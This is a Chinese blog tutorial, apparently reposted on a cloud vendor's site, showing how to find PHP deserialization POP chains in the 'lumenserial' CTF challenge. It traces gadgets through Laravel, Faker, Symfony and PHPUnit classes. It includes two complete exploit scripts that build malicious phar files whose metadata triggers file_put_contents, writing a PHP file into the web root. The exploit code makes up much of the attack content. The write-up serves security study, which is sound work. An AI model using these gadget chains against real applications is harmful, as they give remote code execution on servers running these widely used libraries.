PHP反序列化中怎样寻找POP链

发布时间:2021-10-11 16:46:42 作者:柒染
来源:亿速云 阅读:141

本篇文章为大家展示了PHP反序列化中怎样寻找POP链,内容简明扼要并且容易理解,绝对能使你眼前一亮,通过这篇文章的详细介绍希望你能有所收获。

code-breakinglumenserial 为例,练习PHP反序列化 POP链 的寻找。

POP链一

我们直接搜索 'function dispatch(' ,发现有一个 Dispatcher 类的 dispatchToQueue 方法中调用的 call_user_func 函数两个参数都可控,而且 dispatch 中调用了 dispatchToQueue 方法,代码如下:

PHP反序列化中怎样寻找POP链

从代码中我们可以看到,只要传入的 $command 变量是 ShouldQueue 类的实例即可。通过搜索,我们会发现 ShouldQueue 是一个接口,那么我们找到其实现类即可。直接搜索 'implements ShouldQueue' ,我们随便选取一个实现类即可,这里我选用 CallQueuedClosure 类,相关代码如下:PHP反序列化中怎样寻找POP链

现在 call_user_func 函数的两个参数都可控,又变成了我们可以调用任意对象的任意方法了,这样我们有可以利用上篇文章中的方法,调用 ReturnCallback 类的 invoke 方法,并传入 StaticInvocation 类的对象作为参数,形成整个完整的 POP链 ,利用 exp 如下:

<?php
namespace Illuminate\Broadcasting{
    class PendingBroadcast{
        protected $events;
        protected $event;
        function __construct($events, $event){
            $this->events = $events;
            $this->event = $event;
        }
    }
    class BroadcastEvent{
        public $connection;
        public function __construct($connection)
        {
            $this->connection = $connection;
        }
    }
};
namespace PHPUnit\Framework\MockObject\Stub{
    class ReturnCallback
    {
        private $callback;
        public function __construct($callback)
        {
            $this->callback = $callback;
        }
    }
};
namespace PHPUnit\Framework\MockObject\Invocation{
    class StaticInvocation{
        private $parameters;
        public function __construct($parameters){
            $this->parameters = $parameters;
        }
    }
};
namespace Illuminate\Bus{
    class Dispatcher{
        protected $queueResolver;
        public function __construct($queueResolver){
            $this->queueResolver = $queueResolver;
        }
    }
};
namespace{
    $function = 'file_put_contents';
    $parameters = array('/var/www/html/11.php','<?php phpinfo();?>');

    $staticinvocation = new PHPUnit\Framework\MockObject\Invocation\StaticInvocation($parameters);
    $broadcastevent = new Illuminate\Broadcasting\BroadcastEvent($staticinvocation);
    $returncallback = new PHPUnit\Framework\MockObject\Stub\ReturnCallback($function);
    $dispatcher = new Illuminate\Bus\Dispatcher(array($returncallback,'invoke'));
    $pendingbroadcast = new Illuminate\Broadcasting\PendingBroadcast($dispatcher,$broadcastevent);
    $o = $pendingbroadcast;

    $filename = 'poc.phar';// 后缀必须为phar,否则程序无法运行
    file_exists($filename) ? unlink($filename) : null;
    $phar=new Phar($filename);
    $phar->startBuffering();
    $phar->setStub("GIF89a<?php __HALT_COMPILER(); ?>");
    $phar->setMetadata($o);
    $phar->addFromString("foo.txt","bar");
    $phar->stopBuffering();
};
?>

我们再通过下面这张图片,来理清整个 POP链 的调用过程。

PHP反序列化中怎样寻找POP链

POP链二

接下来这个 POP链 思路是参考 这篇 文章,寻找 POP链 的思路还是从 dispatch 方法入手。在上篇文章中,我们发现第一个 RCE 走了 Generator 类的 __call 方法,这个方法作为 POP链 中的一部分极其好用,因为 call_user_func_array 方法中的两个参数完全可控。我们只要找到方法中存在形如 this->$object->$method($arg1,$arg2) ,且 $object$method$arg1$arg2 四个参数均可控制,那么就可以利用这个 Generator 类的 __call 方法,最终调用 call_user_func_array('file_put_contents',array('1.php','xxx'))

PHP反序列化中怎样寻找POP链

我们继续搜索 dispatch ,会发现一个 TraceableEventDispatcher 类的 dispatch 方法,其代码如下:

PHP反序列化中怎样寻找POP链

我们发现其调用了 preProcess 方法,传入的 $eventName 变量是可控的,我们跟进该方法, 具体代码如下:

PHP反序列化中怎样寻找POP链

可以看到我们得让 $this->dispatcher->hasListeners($eventName) 返回 true ,否则返回的空值对我们无用。然后 第12行getListeners 方法返回的值得是一个数组,这样我们才能进入 foreach 结构里。之所以要进到 foreach 结构里,是因为我们在 第16行 看到了 $this->dispatcher->removeListener($eventName, $listener) ,结构形如: this->$object->$method($arg1,$arg2) ,前三个参数可以按照如下构造:

this->$object =  new Faker\Generator();
this->$object->$method = 'removeListener';
arg1 = '/var/www/html/1.php';
this->formatters['removeListener'] = 'file_put_contents';

这样子构造之后,执行到 $this->dispatcher->removeListener($eventName, $listener) 时,就会调用 Generator 类的 __call 方法,继而执行 call_user_func_array('file_put_contents',array('/var/www/html/upload/1.php',$listener)) ,所以我们只要再确保第四个参数 $listener 可控即可。

现在我们再回到上面 第6行if 语句,我们需要先绕过这个判断条件。该代码会调用 Faker\Generator 类的 hasListeners 方法,进而触发 __call 方法,那么我们只要将 this->formatters['hasListeners'] 设置成 'strlen' 即可,之后就会调用 call_user_func_array('strlen','var/www/html') ,这样就可以绕过 if 语句。

j接着我们再回到 foreach 语句,继续搜索可利用的 getListeners 方法,看看是否可以返回一个可控数组(返回数组才能进入 foreach 语句)。通过搜索,我们会发现一个 Dispatcher 类的 getListeners 符合我们的要求,其具体代码如下:

PHP反序列化中怎样寻找POP链

此时 $eventName 是我们传入的 '/var/www/html/upload/1.php' ,很明显上面的代码中可以返回一个数组,而且数组的值完全可控。

刚才 foreach 中的 $this->dispatcher->getListeners() 调用的是 Faker\Generator 类的 getListeners 方法,现在我们要想办法让它调用 Dispatcher 类的 getListeners 方法。我们再看一下刚才 Generator 的调用流程图:

PHP反序列化中怎样寻找POP链

可以看到只要我们将 this->providers 设置为 array(Dispatcher类) 即可,之后的调用就类似于 call_user_func_array(array(Dispatcher类,'getListeners'),'/var/www/html/1.php')

现在基本完成了整个利用链,不过在执行到 $this->dispatcher->removeListener($eventName, $listener) 之前,还有一些额外的代码需要执行,我们要确保这些代码不会影响我们下面的方法,所以我们需要继续看 foreach 下面的代码(这里说的是 TraceableEventDispatcherpreProcess 方法中的 foreach )。

我们看到其调用了本类的 getListenerPriority 方法,具体代码如下:

PHP反序列化中怎样寻找POP链

我们看到 第16行 ,返回 $this->dispatcher->getListenerPriority($eventName, $listener) ,简直完美。我们可以不用执行到刚才的 removeListener 方法,直接到这里就可以完成整个 POP链 了。最终的利用 exp 如下:

<?php
namespace Illuminate\Events{
    class Dispatcher{
        protected $listeners;
        protected $wildcardsCache;
        public function __construct($parameter,$function){
            $this->listeners[$parameter['filename']] = array($parameter['contents']);
        }
    }
};
namespace Faker{
    class Generator{
        protected $providers;
        protected $formatters;
        public function __construct($providers,$formatters){
            $this->providers = $providers;
            $this->formatters = $formatters;
        }
    }
};
namespace Symfony\Component\EventDispatcher\Debug{
    class TraceableEventDispatcher{
        private $dispatcher;
        public function __construct($dispatcher){
            $this->dispatcher = $dispatcher;
        }
    }
};
namespace Illuminate\Broadcasting{
    class PendingBroadcast{
        protected $events;
        protected $event;
        public function __construct($events, $parameter){
            $this->events = $events;
            $this->event = $parameter['filename'];
        }
    }
}

namespace {
    $function = 'file_put_contents';
    $parameters = array('filename' => '/var/www/html/1.php','contents' => '<?php phpinfo();?>');

    $dispatcher = new \Illuminate\Events\Dispatcher($parameters,$function);
    $generator = new \Faker\Generator([$dispatcher],['hasListeners'=>'strlen','getListenerPriority'=>$function]);
    $traceableeventdispatcher = new Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher($generator);
    $pendingbroadcast = new Illuminate\Broadcasting\PendingBroadcast($traceableeventdispatcher,$parameters);
    $o = $pendingbroadcast;

    $filename = 'poc.phar';// 后缀必须为phar,否则程序无法运行
    file_exists($filename) ? unlink($filename) : null;
    $phar=new Phar($filename);
    $phar->startBuffering();
    $phar->setStub("GIF89a<?php __HALT_COMPILER(); ");
    $phar->setMetadata($o);
    $phar->addFromString("foo.txt","bar");
    $phar->stopBuffering();
}
?>

我们再通过下面这张图片,来理清整个 POP链 的调用过程。

PHP反序列化中怎样寻找POP链

上述内容就是PHP反序列化中怎样寻找POP链,你们学到知识或技能了吗?如果还想学到更多技能或者丰富自己的知识储备,欢迎关注亿速云行业资讯频道。

推荐阅读:
  1. python中pop有哪些作用
  2. PHP中如何使用array_pop()语句

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

pop php

上一篇:如何利用PHP中的Session

下一篇:PHP Stream Wrappers的利用技巧是怎样的

相关阅读

您好,登录后才能下订单哦!

密码登录
登录注册
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》